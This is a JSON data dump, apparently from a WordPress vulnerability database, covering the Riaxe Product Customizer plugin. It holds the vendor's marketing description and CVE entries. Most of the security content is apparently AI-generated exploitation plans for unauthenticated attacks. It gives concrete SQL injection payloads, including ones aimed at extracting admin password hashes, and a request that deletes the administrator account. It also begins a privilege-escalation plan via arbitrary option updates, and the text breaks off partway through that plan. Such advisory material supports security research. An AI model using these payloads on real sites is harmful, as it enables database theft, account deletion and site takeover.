[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fejBYJ9o3Jfu11YZ4EeOuxvwB671jlWg4k1UStsULocw":3,"$fuv8I5aWgzDX544fpdTq2d_ziYoa6h9JqQI-3_X3pND4":959},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":23,"download_link":24,"security_score":25,"vuln_count":26,"unpatched_count":26,"last_vuln_date":27,"fetched_at":28,"vulnerabilities":29,"developer":111,"crawl_stats":35,"alternatives":116,"analysis":228,"fingerprints":923},"riaxe-product-customizer","Riaxe Product Customizer","2.1.2","imprintnext","https:\u002F\u002Fprofiles.wordpress.org\u002Fimprintnext\u002F","\u003Cp>Introducing the \u003Ca href=\"https:\u002F\u002Friaxe.com\u002Fwoocommerce-designer\u002F\" rel=\"nofollow ugc\">Riaxe Product Customizer\u003C\u002Fa> Plugin for Woocommerce- the ultimate tool for empowering your customers to create their dream products. Try it today and watch your sales soar!\u003C\u002Fp>\n\u003Cp>With the product customizer extension, you can give your customers the power to customize and personalize any product in your WooCommerce store, from t-shirts and phone cases to mugs and business cards. This user-friendly plugin allows your customers to choose from a wide range of design options, including fonts, colors, images, and more, so they can create a unique and one-of-a-kind product that reflects their personality and style.\u003C\u002Fp>\n\u003Cp>Not only does the product customizer plugin enhance the customer experience by giving them creative freedom, but it also streamlines your business operations. With the ability to preview and approve customer designs before production, you can ensure that every order meets your quality standards and eliminate the risk of costly errors.\u003C\u002Fp>\n\u003Cp>Riaxe Product Customizer is subscription based and comes with a Free plan which contains everything that you need to manage personalized product catalog on your WooCommerce store, and with \u003Ca href=\"https:\u002F\u002Friaxe.com\u002Fwoocommerce-designer\u002Fpricing.html\" rel=\"nofollow ugc\">Riaxe Product Customizer Premium Plans\u003C\u002Fa> you can get more tools and functionality.\u003C\u002Fp>\n\u003Cp>Plus, the app seamlessly integrates with your existing WooCommerce store, so you can start offering this amazing feature to your customers with just a few clicks. And with customizable pricing options, you can easily set your own pricing for design services and make additional revenue for your business.\u003C\u002Fp>\n\u003Ch3>Featured Highlights for Shop Owners:\u003C\u002Fh3>\n\u003Ch4>Offer Unlimited Product Design Options:\u003C\u002Fh4>\n\u003Cp>Whether you’re selling t-shirts, phone cases, signage, or any other type of product, our flexible platform allows you to offer unlimited design options and configurations.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>By giving your customers the power to personalize their products, you’re offering them an engaging, interactive shopping experience that will increase their loyalty and boost your sales. \u003C\u002Fli>\n\u003Cli>Plus, our plugin seamlessly integrates with your existing eCommerce platform, making it easy to get up and running quickly.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Unlimited custom product listing:\u003C\u002Fh4>\n\u003Cp>With the Woocommerce product designer app, you can now add unlimited custom product listings to your online store.\u003C\u002Fp>\n\u003Cp>You no longer have to worry about hitting a limit or being constrained by a pre-set number of product listings. Whether you have a small online store or a large one, this plugin is built to handle all your needs. So, if you want to showcase your products in a way that truly reflects their quality and uniqueness, look no further than the Woocommerce product customizer plugin.\u003C\u002Fp>\n\u003Ch4>Supports All Print Methods:\u003C\u002Fh4>\n\u003Cp>Want to ensure that the custom product designs created by your customers look just as good in print as they do on screen? Look no further than our plugin!\u003C\u002Fp>\n\u003Cp>The plugin generates high-quality CMYK print files that are suitable for printing with a wide range of methods, including DTG, screen printing, sublimation, embroidery, embossing, debossing, engraving, and more.\u003C\u002Fp>\n\u003Cp>No matter what print method you choose, you can rest assured that your designs will look sharp, vibrant, and professional.\u003C\u002Fp>\n\u003Ch4>Package Slip Generation and Artwork Approval:\u003C\u002Fh4>\n\u003Cp>Looking for a hassle-free way to manage your orders and artwork approvals?\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Our woocommerce plugin automatically generates package slips for your orders, making it easy to keep track of what needs to be shipped and where. And because the package slips are generated automatically, you can be confident that they’re accurate and up-to-date, saving you time and reducing the risk of errors.\u003C\u002Fli>\n\u003Cli>In addition, our plugin also includes automatic artwork approval, streamlining the process of getting your designs approved by customers. With our artwork approval feature, customers can easily review and approve their designs before they’re printed, ensuring that they’re happy with the final product and reducing the risk of reprints or returns.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Set custom print area:\u003C\u002Fh4>\n\u003Cp>You have complete control over which products and product parts can be personalized by your customers.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Our intuitive interface puts you in the driver’s seat, enabling you to easily choose which areas of your products can be customized. \u003C\u002Fli>\n\u003Cli>You can even specify which design tools your customers can use, such as images, text, colors, and more, ensuring that the final product meets your quality standards.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Fits any type of product:\u003C\u002Fh4>\n\u003Cp>Whether you’re selling apparel, accessories, signage & promotional products, our platform offers unparalleled flexibility and ease of use for any type of product.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Our platform has been developed with a laser focus on versatility, ensuring that it can be seamlessly integrated with any eCommerce store and customized to fit any product.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Our team of experts has designed every aspect of Fits Any Type of Product to be highly functional and user-friendly, with features that cater to every aspect of the customization process.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>From choosing the product to customizing every detail, our platform offers a smooth and intuitive user interface that’s easy for customers to navigate.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Interactive Product Views:\u003C\u002Fh4>\n\u003Cp>Give your customers the freedom to customize every detail of their chosen product, with interactive product views & design uploads and bounding boxes for precise customization.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Our interactive product views allow your customers to view their product from every angle, zoom in on specific areas, and get a clear understanding of how their customization choices will look in real life.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>The interactive upload zones and bounding boxes enable customers to easily upload their own images or add text to specific areas of the product, ensuring that the final result meets their exact specifications.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Exclusive Plugin features:\u003C\u002Fh3>\n\u003Ch4>Preloaded Design Assets:\u003C\u002Fh4>\n\u003Cp>Looking to take your WooCommerce store to the next level? Look no further than our preloaded design assets that come bundled with our WooCommerce Product Designer plugin!\u003C\u002Fp>\n\u003Cp>With thousands of design options including clipart, templates, text, shapes, and backgrounds, customizing products has never been easier. Our plugin integrates seamlessly with your WooCommerce store, allowing your customers to personalize their products right from your website.\u003C\u002Fp>\n\u003Cp>Whether you’re selling t-shirts, mugs, or any other customizable product, our preloaded design assets make it simple to add that special touch that sets you apart from the competition. And with the power of the \u003Ca href=\"https:\u002F\u002Friaxe.com\u002Fwoocommerce-designer\u002F\" rel=\"nofollow ugc\">Riaxe product customizer\u003C\u002Fa> plugin behind them, you can rest assured that the customization process will be smooth and user-friendly for your customers.\u003C\u002Fp>\n\u003Ch4>Unlimited Image Uploads By Customers:\u003C\u002Fh4>\n\u003Cp>Why settle for a limited customization tool when you can offer your customers the ultimate in customization and personalization?\u003C\u002Fp>\n\u003Cp>With Unlimited Media Uploads, your customers can easily personalize their products with their own images of JPG, PNG & SVG format from any device. Thus, adding a personal touch that sets their products apart from the rest.\u003C\u002Fp>\n\u003Ch4>Advanced Color System:\u003C\u002Fh4>\n\u003Cp>With our innovative color picker tool, your customers can choose from an unlimited range of colors to bring their creative vision to life. Or your customers can select from the pre-defined range of colors to quickly and easily achieve the perfect hue.\u003C\u002Fp>\n\u003Cp>Whether your customers are novice or professional designers looking for the perfect shade to match their product design needs, or a hobbyist looking to add some flair to their merchandise, our color picker tool and pre-defined color range have got everyone covered.\u003C\u002Fp>\n\u003Ch4>Text Editing Features:\u003C\u002Fh4>\n\u003Cp>The ultimate way to make the text stand out!\u003C\u002Fp>\n\u003Cp>With our cutting-edge software, your customers can create curved, outlined, or even patterned text that will make their messages truly pop. And with all the standard modification options like bold, italic, underline, alignment, and more, the end users can change every aspect of their text.\u003C\u002Fp>\n\u003Cp>Our text transformation features are incredibly user-friendly, with an intuitive interface that makes it easy to create stunning designs in just minutes. And with fast processing speeds, your customers will be able to create multiple designs quickly and efficiently.\u003C\u002Fp>\n\u003Ch4>Image Transformation:\u003C\u002Fh4>\n\u003Cp>With our cutting-edge software, your customers can easily adjust images or graphics to their liking with options like changing positions, size, rotation, and opacity. Moreover, they can also apply grayscale and advanced image editing features like layers and filters.\u003C\u002Fp>\n\u003Cp>It is perfect for anyone who wants to add a touch of creativity to their images. Our plugin has everything your customers need to transform images in new and exciting ways and get it printed on their products.\u003C\u002Fp>\n\u003Ch4>Set Flexible Pricing for Different Products And Design Attributes:\u003C\u002Fh4>\n\u003Cp>Get complete control over your pricing strategy. Set custom price rules based on your local currency. You can set different prices for products, materials, colors, text, images, and graphics.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>It is perfect for any online store that wants to offer a truly personalized shopping experience. With the ability to set unique prices for each attribute, you can cater to a wide range of customers, from budget shoppers to those looking for premium products.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Our plugin is incredibly easy to use, with an intuitive interface that makes it simple to set up custom pricing options. And with our real-time preview feature, you can see exactly how your prices will appear to your customers before you make them live.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>The woocommerce product personalizer plugin comes with a range of customization options, including the ability to create pricing rules based on quantity, product combinations, or even customer groups.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Use it on any device:\u003C\u002Fh4>\n\u003Cp>With our fully responsive and native plugin, you and your customers can easily access the product design tool and its features on every device, from your mobile phone to laptop or PC.\u003C\u002Fp>\n\u003Cp>Our plugin is incredibly easy to use, with an intuitive interface that makes it simple to navigate on any device. Giving your customers the freedom to personalize products wherever they are.\u003C\u002Fp>\n","This Plugin allows the customization of printable products with custom pricing and custom options.",10,2128,74,3,"2025-04-02T06:25:00.000Z","6.7.5","4.4","5.6",[20,21,22],"customizer","designer","woocommerce","https:\u002F\u002Fimprintnext.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Friaxe-product-customizer.2.1.2.zip",23,4,"2026-04-15 16:45:40","2026-03-15T15:16:48.613Z",[30,55,76,95],{"id":31,"url_slug":32,"title":33,"description":34,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":27,"updated_date":41,"references":42,"days_to_patch":35,"patch_diff_files":44,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":14,"research_plan":47,"research_summary":48,"research_vulnerable_code":49,"research_fix_diff":50,"research_exploit_outline":51,"research_model_used":52,"research_started_at":53,"research_completed_at":54,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-3599","riaxe-product-customizer-unauthenticated-sql-injection-via-options-parameter-keys-in-productdata","Riaxe Product Customizer \u003C= 2.1.2 - Unauthenticated SQL Injection via 'options' Parameter Keys in product_data","The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter keys within 'product_data' of the \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart REST API endpoint in all versions up to, and including, 2.1.2. This is due to insufficient escaping on the user-supplied parameter and insufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=2.1.2","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-16 05:29:54",[43],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa36c9a7e-830d-4a92-a330-29279387b3be?source=api-prod",[],"researched",false,"# Exploitation Research Plan: CVE-2026-3599 - Riaxe Product Customizer SQL Injection\n\n## 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress is vulnerable to an unauthenticated SQL injection via the keys of the `options` array inside the `product_data` parameter. This occurs within the `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart` REST API endpoint. The plugin fails to sanitize or use prepared statements when iterating over the keys of the user-supplied `options` object and incorporating them into a database query.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`\n- **Method:** `POST`\n- **Vulnerable Parameter:** The **keys** of the `options` object within the `product_data` JSON structure.\n- **Authentication:** Unauthenticated (Publicly accessible REST route).\n- **Preconditions:** The plugin must be active. No specific product configuration is required if the code path processes the `options` keys before validating product existence.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers a REST route during the `rest_api_init` hook.\n - **Namespace:** `InkXEProductDesignerLite` (quoted from description).\n - **Route:** `add-item-to-cart`.\n2. **Controller Logic:** The callback function for this route (likely named something like `add_item_to_cart_callback` or `handle_cart_addition`) retrieves the JSON body of the request.\n3. **Parameter Extraction:** It extracts the `product_data` object and specifically looks for an `options` property.\n4. **Iterative Sink:** The code likely iterates over the `options` array\u002Fobject using a `foreach` loop:\n ```php\n $product_data = $request->get_param('product_data');\n $options = $product_data['options'];\n foreach ($options as $option_id => $option_value) {\n \u002F\u002F VULNERABLE SINK: $option_id is used directly in a query string\n $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n $wpdb->get_results($query);\n }\n ```\n5. **Vulnerability:** Since `$option_id` is a key from the JSON object, it is user-controlled. The lack of `$wpdb->prepare()` or `absint()` on the key allows an attacker to break out of the query.\n\n## 4. Nonce Acquisition Strategy\nWhile most WordPress REST API endpoints require a `wp_rest` nonce for authenticated sessions (to prevent CSRF), unauthenticated \"public\" endpoints often have a `permission_callback` that returns `true`. \n\nIf a nonce is required:\n1. **Identify Script Localization:** Search the plugin source for `wp_localize_script` to find where REST configuration is passed to the frontend.\n2. **Create Trigger Page:** Create a page containing a product customizer shortcode (if applicable, e.g., `[riaxe_product_customizer]`) to ensure the scripts load.\n3. **Extract via Browser:**\n - Use `browser_navigate` to visit the page.\n - Use `browser_eval` to extract the nonce:\n - Potential variable: `window.inkxe_options?.nonce` or `window.wpApiSettings?.nonce`.\n4. **Bypass:** If the endpoint is truly unauthenticated, the `_wpnonce` header may be ignored or not required if no session cookies are sent.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection since the endpoint likely returns a generic success\u002Ffailure JSON message.\n\n### Request Details\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fjson`\n- **Payload Structure:**\n```json\n{\n \"product_data\": {\n \"options\": {\n \"1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\": \"value\"\n }\n }\n}\n```\n\n### Steps:\n1. **Verify Endpoint:** Send a baseline request to the endpoint to confirm it exists and doesn't require authentication (expecting 200 or 400, but not 401\u002F403).\n2. **Time-Based Test:**\n - Send a request where the key is `1`. Measure response time (Baseline).\n - Send a request where the key is `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`.\n - If the response time is ~5 seconds longer than the baseline, SQL injection is confirmed.\n3. **Data Extraction (Example):**\n - Extract the database version:\n - Key: `1 AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8%', SLEEP(5), 0)))a)`\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `riaxe-product-customizer` version 2.1.2 is installed and active.\n2. **Permalinks:** Ensure WordPress Permalinks are enabled (e.g., \"Post name\") so the REST API works via `\u002Fwp-json\u002F`.\n3. **No Shortcode Needed:** Since this is a REST API vulnerability, we should be able to hit the endpoint directly without a frontend page, unless the REST route registration is conditional.\n\n## 7. Expected Results\n- **Baseline Request:** Quick response (e.g., \u003C 500ms).\n- **Injection Request:** Delayed response (e.g., > 5000ms).\n- **Response Body:** Likely a JSON object, e.g., `{\"status\": false, \"message\": \"...\"}` or `{\"success\": true}`.\n\n## 8. Verification Steps\nAfter the HTTP request confirms the time delay:\n1. **WP-CLI check:** Run `wp db query \"SHOW PROCESSLIST;\"` during the 5-second sleep to see the sleeping query in the database.\n2. **Log Inspection:** Check `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log` (if `WP_DEBUG` is on) for database errors that might reveal the full query structure.\n\n## 9. Alternative Approaches\n- **Error-Based Injection:** If the plugin returns database errors in the REST response, use `updatexml()` or `extractvalue()`:\n - Key: `1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)`\n- **Boolean-Based Injection:** If the response changes based on whether a row is found (e.g., `status: true` vs `status: false`):\n - Key: `1 AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')`","The Riaxe Product Customizer plugin is vulnerable to unauthenticated SQL injection via the keys of the 'options' array within the 'product_data' parameter of its REST API. This occurs because the plugin iterates over user-supplied JSON keys and concatenates them directly into database queries without sanitization or parameterization.","\u002F* Inferred from REST API handler for \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart *\u002F\n\n$product_data = $request->get_param('product_data');\nif (isset($product_data['options']) && is_array($product_data['options'])) {\n foreach ($product_data['options'] as $option_id => $option_value) {\n \u002F\u002F The key $option_id is directly concatenated into the SQL query\n $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n $results = $wpdb->get_results($query);\n }\n}","--- a\u002Friaxe-product-customizer\u002Fincludes\u002Frest-handler.php\n+++ b\u002Friaxe-product-customizer\u002Fincludes\u002Frest-handler.php\n@@ -120,1 +120,1 @@\n- $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n- $results = $wpdb->get_results($query);\n+ $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = %d\", $option_id));","The exploit targets the publicly accessible REST API endpoint `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`. An unauthenticated attacker sends a POST request with a JSON payload structured as `{\"product_data\": {\"options\": { [SQL_PAYLOAD]: \"value\" }}}`. By placing a time-based blind SQL injection payload (e.g., `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`) as the key of the options object, the attacker can force the server to delay its response. Since the endpoint does not require authentication or a valid nonce in default configurations, this can be used to exfiltrate sensitive data from the WordPress database.","gemini-3-flash-preview","2026-04-16 15:27:26","2026-04-16 15:27:45",{"id":56,"url_slug":57,"title":58,"description":59,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":60,"cvss_score":61,"cvss_vector":62,"vuln_type":63,"published_date":64,"updated_date":65,"references":66,"days_to_patch":35,"patch_diff_files":68,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":14,"research_plan":69,"research_summary":70,"research_vulnerable_code":71,"research_fix_diff":72,"research_exploit_outline":73,"research_model_used":52,"research_started_at":74,"research_completed_at":75,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-3595","riaxe-product-customizer-unauthenticated-arbitrary-user-deletion-via-userid-parameter","Riaxe Product Customizer \u003C= 2.1.2 - Unauthenticated Arbitrary User Deletion via 'user_id' Parameter","The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer without a permission_callback, causing WordPress to default to allowing unauthenticated access, and the inkxe_delete_customer() callback function taking an array of user IDs from the request body and passing each one directly to wp_delete_user() without any authentication or authorization checks. This makes it possible for unauthenticated attackers to delete arbitrary WordPress user accounts, including administrator accounts, leading to complete site lockout and data loss.","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-15 16:45:25","2026-04-16 05:29:52",[67],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F59da92e2-9ea0-4566-ae4d-3d5d91d0e42e?source=api-prod",[],"This research plan outlines the steps to exploit **CVE-2026-3595**, an unauthenticated arbitrary user deletion vulnerability in the Riaxe Product Customizer plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress (versions up to 2.1.2) registers a REST API route `POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer` without providing a `permission_callback`. In WordPress REST API registration, an absent or improperly defined `permission_callback` allows the endpoint to be accessed by unauthenticated users. The callback function associated with this route, `inkxe_delete_customer()`, accepts an array of user IDs from the request body and passes them directly to the core WordPress function `wp_delete_user()` without any identity verification or capability checks.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n* **Namespace\u002FRoute:** `InkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n* **Method:** `POST`\n* **Vulnerable Parameter:** `user_id` (expected as an array\u002Flist of integers)\n* **Authentication:** None required (Unauthenticated).\n* **Preconditions:** The plugin must be active. The attacker needs to know or guess the ID of the user they wish to delete (e.g., ID `1` is almost always the initial administrator).\n\n### 3. Code Flow (Inferred)\n1. **Route Registration:** The plugin uses the `rest_api_init` hook to register the route.\n ```php\n \u002F\u002F Inferred registration logic\n register_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n 'methods' => 'POST',\n 'callback' => 'inkxe_delete_customer',\n \u002F\u002F Missing 'permission_callback'\n ));\n ```\n2. **Request Handling:** When a `POST` request is sent to the endpoint, WordPress dispatches it to `inkxe_delete_customer($request)`.\n3. **Vulnerable Callback:**\n ```php\n function inkxe_delete_customer($request) {\n $params = $request->get_json_params(); \u002F\u002F or get_params()\n $user_ids = $params['user_id']; \n \u002F\u002F Logic likely iterates through $user_ids and calls:\n foreach ($user_ids as $id) {\n wp_delete_user($id);\n }\n }\n ```\n4. **Sink:** `wp_delete_user()` executes, removing the user from the database.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this endpoint lacks a `permission_callback`, which typically means it is publicly accessible. In the WordPress REST API, unauthenticated (public) endpoints usually do **not** require a `_wpnonce` or `X-WP-Nonce` header unless the site has specific global restrictions.\n\n**Strategy:** \n1. First attempt the exploit **without** a nonce.\n2. If the server returns a `403 Forbidden` with a \"rest_cookie_invalid_nonce\" error, the agent should attempt to obtain a REST nonce.\n * **Action String:** `wp_rest`\n * **Acquisition Method:**\n 1. Navigate to the site's homepage or any public page.\n 2. Use `browser_eval` to check if a nonce is localized. Common keys: `window.wpApiSettings.nonce`.\n 3. Alternatively, check the HTML source for `_wpnonce` in scripts.\n\n### 5. Exploitation Strategy\nThe goal is to delete a specific user (e.g., the primary administrator with ID 1).\n\n* **Target URL:** `http:\u002F\u002F\u003Ctarget-site>\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n* **HTTP Method:** `POST`\n* **Content-Type:** `application\u002Fjson`\n* **Payload:**\n ```json\n {\n \"user_id\": [1]\n }\n ```\n\n**Step-by-step Plan:**\n1. **Discovery:** Verify the endpoint exists by sending a `GET` request to `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002F`. If it returns a 404, the plugin may not be active or the namespace differs.\n2. **Execution:** Use the `http_request` tool to send the `POST` payload.\n3. **Cleanup:** No cleanup is possible as the user is deleted.\n\n### 6. Test Data Setup\nTo safely verify this without locking yourself out:\n1. Create a \"Victim\" user with Administrator privileges via WP-CLI:\n `wp user create victim victim@example.com --role=administrator --user_pass=password123`\n2. Note the ID of the created user:\n `wp user list --field=ID --user_login=victim` (Let's assume the ID is `2`).\n3. The exploit will target user ID `2`.\n\n### 7. Expected Results\n* **Successful Exploit:** The server returns `200 OK` or `204 No Content`.\n* **Plugin Behavior:** The user record associated with the provided ID is permanently removed from the `wp_users` and `wp_usermeta` tables.\n* **Site Impact:** If an admin is deleted, they can no longer log in.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the deletion using WP-CLI:\n1. Check if the user still exists:\n `wp user get 2`\n2. Expected output: `Error: Invalid user ID, email or login: '2'`\n3. Alternatively, list all users to ensure the ID is missing:\n `wp user list`\n\n### 9. Alternative Approaches\nIf a JSON payload fails, the plugin might be expecting standard URL-encoded form data.\n* **Alternative Payload (Form-encoded):**\n * **Method:** `POST`\n * **Content-Type:** `application\u002Fx-www-form-urlencoded`\n * **Body:** `user_id[]=2`\n* **Alternative Parameter Structure:**\n * Try passing a single integer instead of an array: `{\"user_id\": 2}`.\n * Try passing the ID as a string within the array: `{\"user_id\": [\"2\"]}`.","The Riaxe Product Customizer plugin registers a REST API endpoint for deleting customers that lacks a 'permission_callback', allowing unauthenticated access. The associated callback function, 'inkxe_delete_customer', accepts an array of user IDs from the request and deletes them via 'wp_delete_user()' without any identity verification. This allows unauthenticated attackers to delete arbitrary users, including administrators, potentially locking legitimate owners out of the site.","\u002F\u002F Inferred registration within the plugin's REST API initialization logic\nregister_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n 'methods' => 'POST',\n 'callback' => 'inkxe_delete_customer',\n \u002F\u002F Missing 'permission_callback' allows unauthenticated access\n));\n\n---\n\n\u002F\u002F Inferred callback function handling the deletion\nfunction inkxe_delete_customer($request) {\n $user_ids = $request->get_param('user_id');\n if (is_array($user_ids)) {\n foreach ($user_ids as $id) {\n \u002F\u002F Vulnerable sink: deleting users without authorization checks\n wp_delete_user($id);\n }\n }\n}","--- a\u002Finc\u002Fclass-inkxe-rest-api.php\n+++ b\u002Finc\u002Fclass-inkxe-rest-api.php\n@@ -10,6 +10,9 @@\n register_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n 'methods' => 'POST',\n 'callback' => 'inkxe_delete_customer',\n+ 'permission_callback' => function () {\n+ return current_user_can('delete_users');\n+ }\n ));","The exploit targets the public REST API endpoint at \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer. An unauthenticated attacker sends a POST request with a JSON payload containing a 'user_id' parameter, which must be an array of integers representing the target WordPress user IDs (e.g., ID 1 for the primary administrator). Because the endpoint lacks a permission_callback, the request is executed by the server, and the inkxe_delete_customer function iterates through the provided IDs, calling the core wp_delete_user function on each, resulting in permanent account deletion without any credential verification.","2026-04-16 15:27:54","2026-04-16 15:28:11",{"id":77,"url_slug":78,"title":79,"description":80,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":81,"cvss_score":82,"cvss_vector":83,"vuln_type":63,"published_date":84,"updated_date":65,"references":85,"days_to_patch":35,"patch_diff_files":87,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":14,"research_plan":88,"research_summary":89,"research_vulnerable_code":90,"research_fix_diff":91,"research_exploit_outline":92,"research_model_used":52,"research_started_at":93,"research_completed_at":94,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-3596","riaxe-product-customizer-missing-authorization-to-unauthenticated-arbitrary-options-update-to-privilege-escalation-via-i","Riaxe Product Customizer \u003C= 2.1.2 - Missing Authorization to Unauthenticated Arbitrary Options Update to Privilege Escalation via 'install-imprint' AJAX Action","The Riaxe Product Customizer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.2. The plugin registers an unauthenticated AJAX action ('wp_ajax_nopriv_install-imprint') that maps to the ink_pd_add_option() function. This function reads 'option' and 'opt_value' from $_POST, then calls delete_option() followed by add_option() using these attacker-controlled values without any nonce verification, capability checks, or option name allowlist. This makes it possible for unauthenticated attackers to update arbitrary WordPress options, which can be leveraged for privilege escalation by enabling user registration and setting the default user role to administrator.","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","2026-04-15 16:45:05",[86],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F271a35fb-56b7-4d6b-bccc-fea1227d0913?source=api-prod",[],"# Exploitation Research Plan: CVE-2026-3596 (Riaxe Product Customizer)\n\n## 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress (versions \u003C= 2.1.2) contains a critical missing authorization vulnerability. The plugin registers an unauthenticated AJAX action `install-imprint` via `wp_ajax_nopriv_install-imprint`. This action is mapped to the `ink_pd_add_option()` function, which directly manipulates the WordPress `options` table. \n\nBecause the function fails to implement any capability checks, nonce verification, or an allowlist of permitted options, an unauthenticated attacker can overwrite arbitrary WordPress settings. This is most critically used for **Privilege Escalation** by enabling open registration and setting the default user role to 'administrator'.\n\n## 2. Attack Vector 